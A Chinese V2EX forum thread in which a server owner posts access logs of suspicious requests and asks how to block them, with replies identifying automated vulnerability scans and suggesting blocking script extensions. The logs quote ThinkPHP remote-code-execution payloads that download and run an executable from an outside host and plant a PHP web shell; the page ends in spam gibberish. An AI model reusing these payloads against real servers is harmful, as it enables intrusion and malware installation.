请问一下服务器上老有奇怪的请求,怎么屏蔽 - V2EX
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
xwbz2018
V2EX    服务器

请问一下服务器上老有奇怪的请求,怎么屏蔽

  •  
  •   xwbz2018 2019-10-21 10:54:10 +08:00 5203 次点击
    这是一个创建于 2254 天前的主题,其中的信息可能已经有所发展或是发生改变。
    46.246.62.176 - - [12/Oct/2019:01:40:24 +0800] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 97 47.100.45.68 - - [12/Oct/2019:04:15:51 +0800] "GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fky.dfg45dfg45.best/download.exe','%SystemRoot%/Temp/mfzycvublfyyyrr32698.exe');start%20%SystemRoot%/Temp/mfzycvublfyyyrr32698.exe HTTP/1.1" 404 97 47.100.45.68 - - [12/Oct/2019:04:15:51 +0800] "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^<?php%20$action%20=%20$_GET['xcmd'];system($action);?^>>hydra.php HTTP/1.1" 404 97 47.100.45.68 - - [12/Oct/2019:04:15:51 +0800] "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fky.dfg45dfg45.best/download.exe','%SystemRoot%/Temp/mfzycvublfyyyrr32698.exe');start%20%SystemRoot%/Temp/mfzycvublfyyyrr32698.exe HTTP/1.1" 404 97 106.75.109.223 - - [12/Oct/2019:13:12:21 +0800] "GET /TP/public/index.php HTTP/1.1" 404 97 106.75.109.223 - - [12/Oct/2019:13:12:22 +0800] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 97 106.75.109.223 - - [12/Oct/2019:13:12:22 +0800] "GET /TP/html/public/index.php HTTP/1.1" 404 97 106.75.109.223 - - [12/Oct/2019:13:12:22 +0800] "GET /elrekt.php HTTP/1.1" 404 97 106.75.109.223 - - [12/Oct/2019:13:12:22 +0800] "GET /index.php HTTP/1.1" 404 97 139.162.88.63 - - [12/Oct/2019:18:06:31 +0800] "GET /echo.php?info=1234567890 HTTP/1.1" 404 97 106.14.152.42 - - [12/Oct/2019:19:33:47 +0800] "HEAD /phpinfo.php HTTP/1.1" 404 - 139.162.88.63 - - [12/Oct/2019:19:39:00 +0800] "GET /echo.php?info=1234567890 HTTP/1.1" 404 97 222.186.130.42 - - [12/Oct/2019:22:40:39 +0800] "GET /TP/public/index.php HTTP/1.1" 404 97 222.186.130.42 - - [12/Oct/2019:22:40:39 +0800] "GET /TP/index.php HTTP/1.1" 404 97 222.186.130.42 - - [12/Oct/2019:22:40:40 +0800] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 97 222.186.130.42 - - [12/Oct/2019:22:40:40 +0800] "GET /html/public/index.php HTTP/1.1" 404 97 222.186.130.42 - - [12/Oct/2019:22:40:40 +0800] "GET /public/index.php HTTP/1.1" 404 97 222.186.130.42 - - [12/Oct/2019:22:40:40 +0800] "GET /TP/html/public/index.php HTTP/1.1" 404 97 222.186.130.42 - - [12/Oct/2019:22:40:40 +0800] "GET /elrekt.php HTTP/1.1" 404 97 222.186.130.42 - - [12/Oct/2019:22:40:40 +0800] "GET /index.php HTTP/1.1" 404 97 
    6 条回复    2019-10-21 14:21:38 +08:00
    lx0758
        1
    lx0758  
       2019-10-21 13:59:45 +08:00
    很明显,这是想扫描你的漏洞
    Vegetable
        2
    Vegetable  
       2019-10-21 14:02:15 +08:00
    这是热心人士在帮你进行服务器漏洞检查,一旦发现漏洞会通过黑掉你进行提醒.没什么特别好的办法屏蔽吧,我都是无视.
    eason1874
        3
    eason1874  
       2019-10-21 14:05:54 +08:00
    挂马机的日常操作,扫描各种 CMS 和框架已经披露的漏洞。

    教你个简单粗暴的方法,如果确定整站没有.php,.asp,.jsp 这些结尾的网址,那就直接把这些结尾的访问全部拒了。如果有呢,那用户访问先插 cookie 校验过 cookie 再允许访问,这样可以解决大部分,因为这种机器大多不会存 cookie 的。
    xwbz2018
        4
    xwbz2018  
    OP
       2019-10-21 14:10:48 +08:00
    @lx0758 嗯,看出来是想搞事情,服务器是 Linux + Java,不会影响正常使用。。不过请问这种一般怎么处理的呢?
    xwbz2018
        5
    xwbz2018  
    OP
       2019-10-21 14:16:03 +08:00
    @Vegetable 热心人士检查几年了。。服务器是 Linux + Java,倒是没多大影响,我就想这些 IP 是不是真实的 IP,然后来一波举报
    xwbz2018
        6
    xwbz2018  
    OP
       2019-10-21 14:21:38 +08:00
    @eason1874 #3 谢谢,除了网页资源,其他后缀都重写了。我这返回 404,应该和拒绝效果差不多吧。

    以前有些爬虫,加了 robots.txt 少了些。

    服务器是无状态的,不太好加 cookie 额
    关于     帮助文档     自助推广系统     博客     API     FAQ     Solana     2822 人在线   最高记录 6679       Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 42ms UTC 14:38 PVG 22:38 LAX 06:38 JFK 09:38
    Do have faith in what you're doing.
    ubao msn snddm index pchome yahoo rakuten mypaper meadowduck bidyahoo youbao zxmzxm asda bnvcg cvbfg dfscv mmhjk xxddc yybgb zznbn ccubao uaitu acv GXCV ET GDG YH FG BCVB FJFH CBRE CBC GDG ET54 WRWR RWER WREW WRWER RWER SDG EW SF DSFSF fbbs ubao fhd dfg ewr dg df ewwr ewwr et ruyut utut dfg fgd gdfgt etg dfgt dfgd ert4 gd fgg wr 235 wer3 we vsdf sdf gdf ert xcv sdf rwer hfd dfg cvb rwf afb dfh jgh bmn lgh rty gfds cxv xcv xcs vdas fdf fgd cv sdf tert sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf shasha9178 shasha9178 shasha9178 shasha9178 shasha9178 liflif2 liflif2 liflif2 liflif2 liflif2 liblib3 liblib3 liblib3 liblib3 liblib3 zhazha444 zhazha444 zhazha444 zhazha444 zhazha444 dende5 dende denden denden2 denden21 fenfen9 fenf619 fen619 fenfe9 fe619 sdf sdf sdf sdf sdf zhazh90 zhazh0 zhaa50 zha90 zh590 zho zhoz zhozh zhozho zhozho2 lislis lls95 lili95 lils5 liss9 sdf0ty987 sdft876 sdft9876 sdf09876 sd0t9876 sdf0ty98 sdf0976 sdf0ty986 sdf0ty96 sdf0t76 sdf0876 df0ty98 sf0t876 sd0ty76 sdy76 sdf76 sdf0t76 sdf0ty9 sdf0ty98 sdf0ty987 sdf0ty98 sdf6676 sdf876 sd876 sd876 sdf6 sdf6 sdf9876 sdf0t sdf06 sdf0ty9776 sdf0ty9776 sdf0ty76 sdf8876 sdf0t sd6 sdf06 s688876 sd688 sdf86